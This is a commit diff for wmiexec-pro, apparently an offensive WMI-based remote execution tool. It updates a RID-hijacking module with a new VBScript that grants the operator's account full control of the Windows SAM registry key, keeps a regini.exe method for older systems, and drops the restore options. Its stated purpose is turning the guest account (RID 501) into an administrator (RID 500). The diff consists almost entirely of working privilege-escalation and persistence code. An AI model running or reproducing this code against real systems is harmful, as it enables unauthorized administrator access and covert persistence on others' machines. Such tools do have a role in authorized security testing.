[Rid-Hijack] Use vbscript to grant access permission.

Signed-off-by: XiaoliChan <2209553467@qq.com>

lib/modules/rid_hijack.py

@@ -47,39 +47,47 @@ def query_user(self):
                     break
         iWbemServices.RemRelease()
 
-    def Permissions_Controller(self, action, user):
+    def Permissions_Controller(self, action, user, currentUsers):
         exec_command = EXEC_COMMAND(self.iWbemLevel1Login, codec="gbk")
-        regini_Attr =[
-            r'HKEY_LOCAL_MACHINE\SAM [1 17]',
-            r'HKEY_LOCAL_MACHINE\SAM\SAM [1 17]',
-            r'HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17]',
-            r'HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17]',
-            r'HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17]',
-            r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\%s [1 17]"%str(format(int(hex(int(user)), 16), '08x'))
-        ]
-
-        if "retrieve" in action:
-            for i in range(1, len(regini_Attr)): regini_Attr[i] = regini_Attr[i].replace('[1 17]','[17]')
-
-        print("[+] Grant / Restrict user permissions to registry key via regini.exe")
-
+        executer_vbs = executeVBS_Toolkit(self.iWbemLevel1Login)
+
         # For old system, if command too long with cause error in Win32_ScheduledJob create method
         # so we need to write batch file on target then execute it.
         if "old" in action:
+            regini_Attr =[
+                r'HKEY_LOCAL_MACHINE\SAM [1 17]',
+                r'HKEY_LOCAL_MACHINE\SAM\SAM [1 17]',
+                r'HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17]',
+                r'HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17]',
+                r'HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17]',
+                r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\%s [1 17]"%str(format(int(hex(int(user)), 16), '08x'))
+            ]
+
+            # No more retrieve options :)
+            #if "retrieve" in action:
+            #    for i in range(1, len(regini_Attr)): regini_Attr[i] = regini_Attr[i].replace('[1 17]','[17]')
+
+            print("[+] Grant / Restrict user permissions to registry key via regini.exe")
+
             ini_Content = ""
             for i in regini_Attr: ini_Content += i + "\r\n"
             ini_FileName = "windows-object-%s.ini"%str(uuid.uuid4())
             with open('./lib/vbscripts/Exec-Command-Silent-UnderNT6-II.vbs') as f: vbs = f.read()
             vbs = vbs.replace("REPLACE_WITH_DEST", r'C:\windows\temp\%s'%ini_FileName).replace("REPLACE_WITH_DATA", base64.b64encode(ini_Content.encode('utf-8')).decode('utf-8')).replace("REPLACE_WITH_COMMAND", r'regini.exe C:\windows\temp\%s'%ini_FileName)
-            executer = executeVBS_Toolkit(self.iWbemLevel1Login)
-            tag = executer.ExecuteVBS(vbs_content=vbs, returnTag=True)
+            tag = executer_vbs.ExecuteVBS(vbs_content=vbs, returnTag=True)
             exec_command.timer_For_UnderNT6()
-            executer.remove_Event(tag)
+            executer_vbs.remove_Event(tag)
         else:
-            cmd = ""
-            for i in regini_Attr: cmd += r'echo %s >> C:\windows\temp\windows.ini && '%i
-            cmd += r"regini.exe C:\windows\temp\windows.ini"
-            exec_command.exec_command_silent(command=cmd)
+            print("[+] Grant / Restrict user permissions to registry key via vbscript")
+            with open('./lib/vbscripts/GrantSamAccessPermission.vbs') as f: vbs = f.read()
+            vbs = vbs.replace("REPLACE_WITH_USER", currentUsers)
+            tag = executer_vbs.ExecuteVBS(vbs_content=vbs, returnTag=True)
+
+            for i in range(5,0,-1):
+                print(f"[+] Waiting {i}s for next step.", end="\r", flush=True)
+                time.sleep(1)
+
+            executer_vbs.remove_Event(tag)
 
     # Default is hijacking guest(RID=501) users to administrator(RID=500)
     def hijack(self, action, user, hijack_RID=None, hostname=None):

lib/vbscripts/GrantSamAccessPermission.vbs

@@ -0,0 +1,40 @@
+strUser = "REPLACE_WITH_USER"
+Set objWMIService = GetObject("winmgmts:\\.\root\Cimv2")
+Set colUsers = objWMIService.ExecQuery("SELECT * FROM Win32_Account WHERE Name='"&strUser&"'")
+If colUsers.count<>0 Then
+    For Each objUser In colUsers
+            strSID = objUser.SID
+    Next
+Else
+End If
+
+Set objSID = objWMIService.Get("Win32_SID.SID='"&strSID&"'")
+
+Set objTrustee = objWMIService.Get("Win32_Trustee").SpawnInstance_()
+objTrustee.Domain = objSID.ReferencedDomainName
+objTrustee.Name = objSID.AccountName
+objTrustee.SID = objSID.BinaryRepresentation
+objTrustee.SidLength = objSID.SidLength
+objTrustee.SIDString = objSID.Sid
+
+Set objNewACE = objWMIService.Get("Win32_ACE").SpawnInstance_()
+objNewACE.AccessMask = 983103
+objNewACE.AceType = 0
+objNewACE.AceFlags = 2
+objNewACE.Trustee = objTrustee
+
+Const HKLM = &H80000002
+strKeyPath = "SAM\SAM"
+Set oReg = GetObject("Winmgmts:\root\default:StdRegProv")
+RetVal = oReg.GetSecurityDescriptor(HKLM,strKeyPath,wmiSecurityDescriptor)
+DACL = wmiSecurityDescriptor.DACL
+ReDim objNewDacl(0)
+Set objNewDacl(0) = objNewACE
+For each objACE in DACL
+    Ubd = UBound(objNewDacl)
+    ReDim preserve objNewDacl(Ubd+1)
+    Set objNewDacl(Ubd+1) = objACE
+Next
+wmiSecurityDescriptor.DACL = objNewDacl
+RetVal = oReg.SetSecurityDescriptor(HKLM,strKeyPath,wmiSecurityDescriptor)
+wscript.echo RetVal

wmiexec-pro.py

@@ -182,8 +182,8 @@ def run(self, addr):
                         RID_Hijack.hijack(self.__options.action, self.__options.user, self.__options.hijack_rid)
                     elif self.__options.action in ['activate', 'deactivate', 'remove'] and all([self.__options.user]):
                         RID_Hijack.hijack(self.__options.action, self.__options.user)
-                    elif self.__options.action in ['grant', 'grant-old', 'retrieve', 'retrieve-old'] and all([self.__options.user]):
-                        RID_Hijack.Permissions_Controller(self.__options.action, self.__options.user)
+                    elif self.__options.action in ['grant', 'grant-old'] and all([self.__options.user]):
+                        RID_Hijack.Permissions_Controller(self.__options.action, self.__options.user, self.__username)
                     elif self.__options.action == "backup" and all([self.__options.user]):
                         RID_Hijack.hijack(self.__options.action, self.__options.user, hostname=addr)
                 elif self.__options.blank_pass_login:
@@ -316,7 +316,7 @@ def run(self, addr):
     rid_HijackParser.add_argument('-query', action='store_true', help="Query all users.")
     rid_HijackParser.add_argument('-user', action='store', help='Specify users RID which you want to playing with.(Like guest user 501)')
     rid_HijackParser.add_argument('-hijack-rid', action='store', help="Specify RID which you want to hijack to.(Like administrator rid 500)")
-    rid_HijackParser.add_argument('-action', action='store', choices=['hijack', 'activate', 'deactivate', 'grant', 'grant-old', 'retrieve', 'retrieve-old', 'backup', 'remove'], help='Action you want to do.')
+    rid_HijackParser.add_argument('-action', action='store', choices=['hijack', 'activate', 'deactivate', 'grant', 'grant-old', 'backup', 'remove'], help='Action you want to do.')
     rid_HijackParser.add_argument('-blank-pass-login', action='store', choices=['enable', 'disable'], help='Enable or disable blank pass login.(for guest user)')
     rid_HijackParser.add_argument('-restore', action='store', help='Restore user profile after you want to do evil operation, need to specify the backup json file)')